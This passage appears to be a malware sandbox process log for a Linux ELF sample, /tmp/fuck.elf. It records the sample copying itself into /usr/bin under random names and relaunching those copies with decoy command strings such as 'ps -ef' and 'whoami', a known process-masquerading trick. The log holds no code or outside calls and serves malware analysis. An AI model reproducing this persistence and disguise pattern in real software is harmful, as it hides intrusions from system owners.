MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:33
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	/usr/bin/jflhtagbsg "netstat -antop" 6236
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:34
Start date:	21/09/2022
Path:	/usr/bin/jflhtagbsg
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	3d4268e4b1640cd06adef2fd8e500b35

Start time:	23:40:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:39
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	/usr/bin/pzvxnaaphf ifconfig 6236
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:39
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:39
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	/usr/bin/pzvxnaaphf whoami 6236
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:40
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:39
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	/usr/bin/pzvxnaaphf "grep \"A\"" 6236
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:40
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:40
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:40
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:40
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	/usr/bin/pzvxnaaphf "grep \"A\"" 6236
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:40
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:40
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:40
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:40
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	/usr/bin/pzvxnaaphf ls 6236
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:40
Start date:	21/09/2022
Path:	/usr/bin/pzvxnaaphf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	1ea2503bf021167e0ad5cd9e4105e210

Start time:	23:40:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:45
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	/usr/bin/kvwpsxprqf "ps -ef" 6236
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:45
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:45
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	/usr/bin/kvwpsxprqf ifconfig 6236
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:45
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:45
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	/usr/bin/kvwpsxprqf bash 6236
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:46
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:46
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:46
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:46
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	/usr/bin/kvwpsxprqf pwd 6236
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:46
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:46
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:46
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:46
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	/usr/bin/kvwpsxprqf "cd /etc" 6236
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:47
Start date:	21/09/2022
Path:	/usr/bin/kvwpsxprqf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	601054bef78df59d8c288b864c76fac6

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	/usr/bin/mkiihbalnq uptime 6236
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	/usr/bin/mkiihbalnq sh 6236
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	/usr/bin/mkiihbalnq ifconfig 6236
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	/usr/bin/mkiihbalnq uptime 6236
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	/usr/bin/mkiihbalnq "sleep 1" 6236
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:52
Start date:	21/09/2022
Path:	/usr/bin/mkiihbalnq
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	900e00841f9ce63bf059581608ca2b3d

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	/usr/bin/azkwpscekh "route -n" 6236
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	/usr/bin/azkwpscekh id 6236
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	/usr/bin/azkwpscekh "echo \"find\"" 6236
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	/usr/bin/azkwpscekh "echo \"find\"" 6236
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	/usr/bin/azkwpscekh "echo \"find\"" 6236
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:40:57
Start date:	21/09/2022
Path:	/usr/bin/azkwpscekh
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	a9404a961ef5413232dec112bcf0fd0c

Start time:	23:41:02
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:02
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:02
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	/usr/bin/apkjkvmecw "cat resolv.conf" 6236
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:03
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:03
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	/usr/bin/apkjkvmecw gnome-terminal 6236
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:03
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:03
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	/usr/bin/apkjkvmecw whoami 6236
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:03
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:03
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	/usr/bin/apkjkvmecw uptime 6236
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:03
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:03
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:03
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	/usr/bin/apkjkvmecw ifconfig 6236
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:03
Start date:	21/09/2022
Path:	/usr/bin/apkjkvmecw
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	5e9b44ef4b6879d3a78ac5291f279080

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	/usr/bin/zflxucbsae "ps -ef" 6236
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	/usr/bin/zflxucbsae "cat resolv.conf" 6236
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	/usr/bin/zflxucbsae id 6236
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	/usr/bin/zflxucbsae "sleep 1" 6236
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	/usr/bin/zflxucbsae ifconfig 6236
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:08
Start date:	21/09/2022
Path:	/usr/bin/zflxucbsae
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	579f2e7251034cd3379b5cabdac75866

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	/usr/bin/lnwhdmdpfq pwd 6236
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	/usr/bin/lnwhdmdpfq who 6236
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	/usr/bin/lnwhdmdpfq id 6236
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	/usr/bin/lnwhdmdpfq "echo \"find\"" 6236
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	/usr/bin/lnwhdmdpfq "grep \"A\"" 6236
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:13
Start date:	21/09/2022
Path:	/usr/bin/lnwhdmdpfq
Arguments:	n/a
File size:	625729 bytes
MD5 hash:	ffb8e74dd5874f58b7c45794e529643d

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/usr/bin/cuofybetod
Arguments:	/usr/bin/cuofybetod gnome-terminal 6236
File size:	625740 bytes
MD5 hash:	554dddb463d9700eaaf0c0bcd370d82f

Start time:	23:41:18
Start date:	21/09/2022
Path:	/usr/bin/cuofybetod
Arguments:	n/a
File size:	625740 bytes
MD5 hash:	554dddb463d9700eaaf0c0bcd370d82f

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/usr/bin/cuofybetod
Arguments:	/usr/bin/cuofybetod uptime 6236
File size:	625740 bytes
MD5 hash:	554dddb463d9700eaaf0c0bcd370d82f

Start time:	23:41:18
Start date:	21/09/2022
Path:	/usr/bin/cuofybetod
Arguments:	n/a
File size:	625740 bytes
MD5 hash:	554dddb463d9700eaaf0c0bcd370d82f

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:41:18
Start date:	21/09/2022
Path:	/tmp/fuck.elf
